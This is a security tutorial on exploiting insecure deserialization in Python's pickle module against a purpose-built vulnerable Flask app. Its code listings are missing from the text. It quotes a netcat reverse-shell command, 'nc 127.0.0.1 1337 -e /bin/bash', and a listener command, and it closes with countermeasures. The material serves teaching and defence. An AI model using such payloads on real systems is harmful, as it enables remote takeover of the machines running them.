Introduction
In this article, we are going to learn about Insecure Deserialization in Python Application due to Improper Implementation of Pickle module, which is most commonly is used to deserialize-serialize objects in python
What exactly is Pickle?
According to Pickle documentation, pickle utilizes binary protocols to serialize and deserialize objects. I.e. When provided with a python object, pickle can convert it into a byte stream as well as it can convert the byte stream to the python object.
Even though pickle is used widely, it is rarely properly implemented which explains its place at 8th rank in OWASP Top 10 web Vulnerabilities. While it is hard to properly craft a deserialization attack on a python application using pickle in the backend, once successful, it can lead to remote code execution, giving the attackers complete control over the system running the application. Exploitation of Deserialization is difficult as for each application exploit should be manually crafted and off the shelf exploits do not work without carefully considered tweaks. As of now there are not many reliable tools that can automatically discover and exploit this class of flaws.
Implementing Pickle in python application
Before diving into the exploitation. We need to understand how serialization and deserialization are done in a typical python application.
We will start with a basic python application and then create a simple website using flask.
So, open your favorite text editor, and create a file named pickled.py
First we will import the pickle with " import pickle" and base64 with "import base64" and create a class with a simple public string good_boi
Now that we have a class set up, we can use the pickle to serialize and deserialize.
We create a byte dump of the class animals with pickle.dumps(animals) and store it in the string serialized_str.
After we have created the byte string, it is not easy to transport a byte string over the network, so we encode it in base64 format with base64.b64encode(serialized_str) and store it in variable encoded_serialized_str. As it is not possible to concat bytes with string type, we convert both serialized_str and encoded_serialized_str to string format and print the output.
Just how we have serialized the string and encoded it to base64 format, after transporting, we can decode the encoded string and then convert the byte stream into the object to use.
Complete program, pickled.py would look like this
When we run this program, we would get the following output,
Now we create a simple flask web application named app.py which takes the encoded serialized string from the user and returns the deserialized object. We will exploit this application in the next section
app.py would look as following
This simple flask application, takes serialized string from the GET request and deserializes the string to return the object. We can run the flask application with a simple "flask run" command.
Now we can craft our exploit
This simple python script will give us a base64 string which contains the serialized object for the list "I am batman"
Now we can copy the base64 encoded string and pass it to the flask application via curl
As you can see, by passing our custom serialized string, we made the flask application to execute our custom code
We can take advantage of this behaviour to get remote command execution on the system
To get the command execution, we can call _reduce_ method to reduce and return callable functions.
Consider following snippet
Here, we serialize an object which will execute the "whoami" command
We can also replace the command with a reverse shell command , "nc 127.0.0.1 1337 -e /bin/bash" to get remote command execution
First we set up a listener in another command window with netcat as, "nc -nlvp 1337"
Then modify the above script as following to give remote command execution
Then run this script to get the string with " python expoit3.py"
The string between two quotes is what we need to pass to the vulnerable application to get remote code execution
Once we execute the curl command with our exploit string, we can see a connection established to the system running the vulnerable application
We can execute commands inside the command window where we have our netcat listener running
So, this is the way improper deserialization in python pickle application can be exploited to get the remote command execution if no user input sanitization is done
Countermeasures
As pickle module is not secure, only the trusted data should be unpickled and never pass the user inputted data to the pickle loads
For increased security, integrity checks such as digital signatures on any serialized objects should be performed
Most secure modern applications implement sandboxing to isolate and run code that deserializes in low privileged environments